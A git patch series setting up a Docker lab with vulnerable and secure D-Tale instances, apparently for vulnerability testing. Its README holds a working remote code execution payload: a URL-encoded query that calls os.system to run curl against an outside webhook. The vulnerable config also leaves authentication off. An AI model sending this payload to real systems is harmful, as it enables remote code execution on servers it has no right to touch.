From f72a82c3976b0f23920416e110b29d83c490d279 Mon Sep 17 00:00:00 2001 From: VickyTheViking Date: Tue, 5 Aug 2025 00:13:48 +0400 Subject: [PATCH 1/3] dtable query method code injection --- dtale/CVE-2024-9016/README.md | 29 ++++++++++++++ dtale/CVE-2024-9016/Secure/Dockerfile | 14 +++++++ dtale/CVE-2024-9016/Secure/config.ini | 46 +++++++++++++++++++++++ dtale/CVE-2024-9016/Vulnerable/Dockerfile | 14 +++++++ dtale/CVE-2024-9016/Vulnerable/config.ini | 46 +++++++++++++++++++++++ 5 files changed, 149 insertions(+) create mode 100644 dtale/CVE-2024-9016/README.md create mode 100644 dtale/CVE-2024-9016/Secure/Dockerfile create mode 100644 dtale/CVE-2024-9016/Secure/config.ini create mode 100644 dtale/CVE-2024-9016/Vulnerable/Dockerfile create mode 100644 dtale/CVE-2024-9016/Vulnerable/config.ini diff --git a/dtale/CVE-2024-9016/README.md b/dtale/CVE-2024-9016/README.md new file mode 100644 index 00000000..38aa710c --- /dev/null +++ b/dtale/CVE-2024-9016/README.md @@ -0,0 +1,29 @@ +# setup Secure instance of D-Tale to CVE-2024-9016 +```bash +cd Secure/ +docker build -t dtale-cve-2024-9016-secure . +docker run --rm --name dtalesecure -p 40000:40000 dtale-cve-2024-9016-secure +``` + + +# setup Vulenrable instance of D-Tale to CVE-2024-9016 +```bash +cd Vulnerable/ +docker build -t dtale-cve-2024-9016 . +docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-cve-2024-9016 +``` +now use the following command to exploit the vulnerability +```bash +# upload sample data +curl 'http://127.0.0.1:40000/dtale/upload' \ + -X POST \ + -H 'Content-Type: multipart/form-data; boundary=----geckoformboundaryb38fffc548bd5dad82328985c3f223d4' \ + --data-binary \ + $'------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="simple-dtale-data.csv"; filename="simple-dtale-data.csv"\r\nContent-Type: text/csv\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="header"\r\n\r\ntrue\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separatorType"\r\n\r\ncomma\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separator"\r\n\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4--\r\n' + # response: 200 OK, body: {"data_id":"1","success":true} + + +# replace https://webhook with your webhook URL +curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://webhook%20%23%22%22%22%29' +# response: 200 OK, body: {"error":"'Series' object has no attribute 'columns.... +``` \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Secure/Dockerfile b/dtale/CVE-2024-9016/Secure/Dockerfile new file mode 100644 index 00000000..b7788110 --- /dev/null +++ b/dtale/CVE-2024-9016/Secure/Dockerfile @@ -0,0 +1,14 @@ +FROM python:3.7 +LABEL cve="CVE-2024-9016-secure" \ + status="secure" \ + description="Secured version D-Tale instance for CVE-2024-9016" + +WORKDIR /app + +RUN pip install dtale==3.13.1 +RUN pip install dash_daq==0.5.0 + +COPY config.ini /config.ini + +EXPOSE 40000 +CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"] \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Secure/config.ini b/dtale/CVE-2024-9016/Secure/config.ini new file mode 100644 index 00000000..fd88bce1 --- /dev/null +++ b/dtale/CVE-2024-9016/Secure/config.ini @@ -0,0 +1,46 @@ + +[app] +theme = light +github_fork = False +hide_shutdown = False +pin_menu = False +language = en +max_column_width = 100 +main_title = My App +main_title_font = Arial +query_engine = python +hide_header_editor = False +lock_header_menu = False +hide_header_menu = False +hide_main_menu = False +hide_column_menus = False +enable_custom_filters = False +enable_web_uploads = False + +[charts] +scatter_points = 15000 +3d_points = 40000 + +[show] +host = localhost +port = 8080 +reaper_on = True +open_browser = False +ignore_duplicate = True +allow_cell_edits = True +inplace = False +drop_index = False +precision = 6 +show_columns = a,b +hide_columns = c +column_formats = {"a": {"fmt": {"html": true}}} +sort = a|ASC +locked = a,b +column_edit_options = {"a": ["foo", "bar", "baz"]} +auto_hide_empty_columns = False +highlight_filter = False + +[auth] +active = False +username = admin +password = admin \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Vulnerable/Dockerfile b/dtale/CVE-2024-9016/Vulnerable/Dockerfile new file mode 100644 index 00000000..f7ec1bf3 --- /dev/null +++ b/dtale/CVE-2024-9016/Vulnerable/Dockerfile @@ -0,0 +1,14 @@ +FROM python:3.7 +LABEL cve="CVE-2024-9016" \ + status="vulnerable" \ + description="Intentionally vulnerable D-Tale instance for CVE-2024-9016" + +WORKDIR /app + +RUN pip install dtale==3.13.1 +RUN pip install dash_daq==0.5.0 + +COPY config.ini /config.ini + +EXPOSE 40000 +CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"] \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Vulnerable/config.ini b/dtale/CVE-2024-9016/Vulnerable/config.ini new file mode 100644 index 00000000..ee4afce8 --- /dev/null +++ b/dtale/CVE-2024-9016/Vulnerable/config.ini @@ -0,0 +1,46 @@ + +[app] +theme = light +github_fork = False +hide_shutdown = False +pin_menu = False +language = en +max_column_width = 100 +main_title = My App +main_title_font = Arial +query_engine = python +hide_header_editor = False +lock_header_menu = False +hide_header_menu = False +hide_main_menu = False +hide_column_menus = False +enable_custom_filters = True +enable_web_uploads = True + +[charts] +scatter_points = 15000 +3d_points = 40000 + +[show] +host = localhost +port = 8080 +reaper_on = True +open_browser = False +ignore_duplicate = True +allow_cell_edits = True +inplace = False +drop_index = False +precision = 6 +show_columns = a,b +hide_columns = c +column_formats = {"a": {"fmt": {"html": true}}} +sort = a|ASC +locked = a,b +column_edit_options = {"a": ["foo", "bar", "baz"]} +auto_hide_empty_columns = False +highlight_filter = False + +[auth] +active = False +username = admin +password = admin \ No newline at end of file From 7f8d7aec278d8d675d8df961b43253764e051f76 Mon Sep 17 00:00:00 2001 From: VickyTheViking Date: Tue, 5 Aug 2025 15:22:41 +0400 Subject: [PATCH 2/3] update CVE to exposed UI as the CVE is rejected --- dtale/CVE-2024-9016/Secure/config.ini | 46 ------------------- dtale/CVE-2024-9016/Vulnerable/Dockerfile | 14 ------ .../Secure => exposed_ui}/Dockerfile | 5 +- dtale/{CVE-2024-9016 => exposed_ui}/README.md | 16 ++----- .../Vulnerable => exposed_ui}/config.ini | 0 5 files changed, 5 insertions(+), 76 deletions(-) delete mode 100644 dtale/CVE-2024-9016/Secure/config.ini delete mode 100644 dtale/CVE-2024-9016/Vulnerable/Dockerfile rename dtale/{CVE-2024-9016/Secure => exposed_ui}/Dockerfile (53%) rename dtale/{CVE-2024-9016 => exposed_ui}/README.md (75%) rename dtale/{CVE-2024-9016/Vulnerable => exposed_ui}/config.ini (100%) diff --git a/dtale/CVE-2024-9016/Secure/config.ini b/dtale/CVE-2024-9016/Secure/config.ini deleted file mode 100644 index fd88bce1..00000000 --- a/dtale/CVE-2024-9016/Secure/config.ini +++ /dev/null @@ -1,46 +0,0 @@ - -[app] -theme = light -github_fork = False -hide_shutdown = False -pin_menu = False -language = en -max_column_width = 100 -main_title = My App -main_title_font = Arial -query_engine = python -hide_header_editor = False -lock_header_menu = False -hide_header_menu = False -hide_main_menu = False -hide_column_menus = False -enable_custom_filters = False -enable_web_uploads = False - -[charts] -scatter_points = 15000 -3d_points = 40000 - -[show] -host = localhost -port = 8080 -reaper_on = True -open_browser = False -ignore_duplicate = True -allow_cell_edits = True -inplace = False -drop_index = False -precision = 6 -show_columns = a,b -hide_columns = c -column_formats = {"a": {"fmt": {"html": true}}} -sort = a|ASC -locked = a,b -column_edit_options = {"a": ["foo", "bar", "baz"]} -auto_hide_empty_columns = False -highlight_filter = False - -[auth] -active = False -username = admin -password = admin \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Vulnerable/Dockerfile b/dtale/CVE-2024-9016/Vulnerable/Dockerfile deleted file mode 100644 index f7ec1bf3..00000000 --- a/dtale/CVE-2024-9016/Vulnerable/Dockerfile +++ /dev/null @@ -1,14 +0,0 @@ -FROM python:3.7 -LABEL cve="CVE-2024-9016" \ - status="vulnerable" \ - description="Intentionally vulnerable D-Tale instance for CVE-2024-9016" - -WORKDIR /app - -RUN pip install dtale==3.13.1 -RUN pip install dash_daq==0.5.0 - -COPY config.ini /config.ini - -EXPOSE 40000 -CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"] \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Secure/Dockerfile b/dtale/exposed_ui/Dockerfile similarity index 53% rename from dtale/CVE-2024-9016/Secure/Dockerfile rename to dtale/exposed_ui/Dockerfile index b7788110..100ea2b8 100644 --- a/dtale/CVE-2024-9016/Secure/Dockerfile +++ b/dtale/exposed_ui/Dockerfile @@ -1,11 +1,8 @@ FROM python:3.7 -LABEL cve="CVE-2024-9016-secure" \ - status="secure" \ - description="Secured version D-Tale instance for CVE-2024-9016" WORKDIR /app -RUN pip install dtale==3.13.1 +RUN pip install dtale==3.18.2 RUN pip install dash_daq==0.5.0 COPY config.ini /config.ini diff --git a/dtale/CVE-2024-9016/README.md b/dtale/exposed_ui/README.md similarity index 75% rename from dtale/CVE-2024-9016/README.md rename to dtale/exposed_ui/README.md index 38aa710c..82d962c7 100644 --- a/dtale/CVE-2024-9016/README.md +++ b/dtale/exposed_ui/README.md @@ -1,16 +1,8 @@ -# setup Secure instance of D-Tale to CVE-2024-9016 -```bash -cd Secure/ -docker build -t dtale-cve-2024-9016-secure . -docker run --rm --name dtalesecure -p 40000:40000 dtale-cve-2024-9016-secure -``` - - -# setup Vulenrable instance of D-Tale to CVE-2024-9016 +# setup a D-Tale inance without need of authentication ```bash cd Vulnerable/ -docker build -t dtale-cve-2024-9016 . -docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-cve-2024-9016 +docker build -t dtale-expose-ui . +docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-expose-ui ``` now use the following command to exploit the vulnerability ```bash @@ -24,6 +16,6 @@ curl 'http://127.0.0.1:40000/dtale/upload' \ # replace https://webhook with your webhook URL -curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://webhook%20%23%22%22%22%29' +curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://webhook.site/fdda6d40-04ad-44d9-922c-d5c6e2359330%20%23%22%22%22%29' # response: 200 OK, body: {"error":"'Series' object has no attribute 'columns.... ``` \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Vulnerable/config.ini b/dtale/exposed_ui/config.ini similarity index 100% rename from dtale/CVE-2024-9016/Vulnerable/config.ini rename to dtale/exposed_ui/config.ini From cb19912f59102ce26d457b6c3bb11a013dab89aa Mon Sep 17 00:00:00 2001 From: VickyTheViking Date: Sun, 5 Oct 2025 15:45:38 +0400 Subject: [PATCH 3/3] secure instance is added, fix exploit commands --- dtale/exposed_ui/README.md | 25 ++++++---- .../exposed_ui/{ => secure_dtale}/Dockerfile | 2 +- dtale/exposed_ui/secure_dtale/config.ini | 46 +++++++++++++++++++ dtale/exposed_ui/vulnerable_dtale/Dockerfile | 11 +++++ .../{ => vulnerable_dtale}/config.ini | 0 5 files changed, 74 insertions(+), 10 deletions(-) rename dtale/exposed_ui/{ => secure_dtale}/Dockerfile (92%) create mode 100644 dtale/exposed_ui/secure_dtale/config.ini create mode 100644 dtale/exposed_ui/vulnerable_dtale/Dockerfile rename dtale/exposed_ui/{ => vulnerable_dtale}/config.ini (100%) diff --git a/dtale/exposed_ui/README.md b/dtale/exposed_ui/README.md index 82d962c7..0f41b301 100644 --- a/dtale/exposed_ui/README.md +++ b/dtale/exposed_ui/README.md @@ -1,21 +1,28 @@ -# setup a D-Tale inance without need of authentication +# Setup a D-Tale instance without needing of authentication(insecure) ```bash -cd Vulnerable/ +cd vulnerable_dtale docker build -t dtale-expose-ui . docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-expose-ui ``` -now use the following command to exploit the vulnerability +# Setup a D-Tale instance with authentication enabled (secure) +```bash +cd secure_dtale +docker build -t dtale-secure . +docker run --rm --name dtale-secure -p 40000:40000 dtale-secure +``` +Now use the following command to exploit the vulnerability ```bash # upload sample data -curl 'http://127.0.0.1:40000/dtale/upload' \ +curl -i 'http://127.0.0.1:40000/dtale/upload' \ -X POST \ - -H 'Content-Type: multipart/form-data; boundary=----geckoformboundaryb38fffc548bd5dad82328985c3f223d4' \ + -H 'Content-Type: multipart/form-data; boundary=-' \ --data-binary \ - $'------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="simple-dtale-data.csv"; filename="simple-dtale-data.csv"\r\nContent-Type: text/csv\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="header"\r\n\r\ntrue\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separatorType"\r\n\r\ncomma\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separator"\r\n\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4--\r\n' - # response: 200 OK, body: {"data_id":"1","success":true} - + $'---\nContent-Disposition: form-data; name="data.csv"; filename="data.csv"\nContent-Type: text/csv\n\ntest,data\n\n---\nContent-Disposition: form-data; name="header"\n\ntrue\n---\nContent-Disposition: form-data; name="separatorType"\n\ncomma\n---\nContent-Disposition: form-data; name="separator"\n\n-----\n' + # response: 200 OK, body: {"data_id":"a number","success":true} # replace https://webhook with your webhook URL -curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://webhook.site/fdda6d40-04ad-44d9-922c-d5c6e2359330%20%23%22%22%22%29' +curl -i -G \ + --data-urlencode 'query=@pd.core.frame.com.builtins.__import__("os").system("""curl https://webhook.site/ #""")' \ + 'http://127.0.0.1:40000/dtale/chart-data/1' # response: 200 OK, body: {"error":"'Series' object has no attribute 'columns.... ``` \ No newline at end of file diff --git a/dtale/exposed_ui/Dockerfile b/dtale/exposed_ui/secure_dtale/Dockerfile similarity index 92% rename from dtale/exposed_ui/Dockerfile rename to dtale/exposed_ui/secure_dtale/Dockerfile index 100ea2b8..cf2375af 100644 --- a/dtale/exposed_ui/Dockerfile +++ b/dtale/exposed_ui/secure_dtale/Dockerfile @@ -1,4 +1,4 @@ -FROM python:3.7 +FROM python:3.10 WORKDIR /app diff --git a/dtale/exposed_ui/secure_dtale/config.ini b/dtale/exposed_ui/secure_dtale/config.ini new file mode 100644 index 00000000..ff7e7019 --- /dev/null +++ b/dtale/exposed_ui/secure_dtale/config.ini @@ -0,0 +1,46 @@ + +[app] +theme = light +github_fork = False +hide_shutdown = False +pin_menu = False +language = en +max_column_width = 100 +main_title = My App +main_title_font = Arial +query_engine = python +hide_header_editor = False +lock_header_menu = False +hide_header_menu = False +hide_main_menu = False +hide_column_menus = False +enable_custom_filters = True +enable_web_uploads = True + +[charts] +scatter_points = 15000 +3d_points = 40000 + +[show] +host = localhost +port = 8080 +reaper_on = True +open_browser = False +ignore_duplicate = True +allow_cell_edits = True +inplace = False +drop_index = False +precision = 6 +show_columns = a,b +hide_columns = c +column_formats = {"a": {"fmt": {"html": true}}} +sort = a|ASC +locked = a,b +column_edit_options = {"a": ["foo", "bar", "baz"]} +auto_hide_empty_columns = False +highlight_filter = False + +[auth] +active = True +username = admin +password = admin \ No newline at end of file diff --git a/dtale/exposed_ui/vulnerable_dtale/Dockerfile b/dtale/exposed_ui/vulnerable_dtale/Dockerfile new file mode 100644 index 00000000..cf2375af --- /dev/null +++ b/dtale/exposed_ui/vulnerable_dtale/Dockerfile @@ -0,0 +1,11 @@ +FROM python:3.10 + +WORKDIR /app + +RUN pip install dtale==3.18.2 +RUN pip install dash_daq==0.5.0 + +COPY config.ini /config.ini + +EXPOSE 40000 +CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"] \ No newline at end of file diff --git a/dtale/exposed_ui/config.ini b/dtale/exposed_ui/vulnerable_dtale/config.ini similarity index 100% rename from dtale/exposed_ui/config.ini rename to dtale/exposed_ui/vulnerable_dtale/config.ini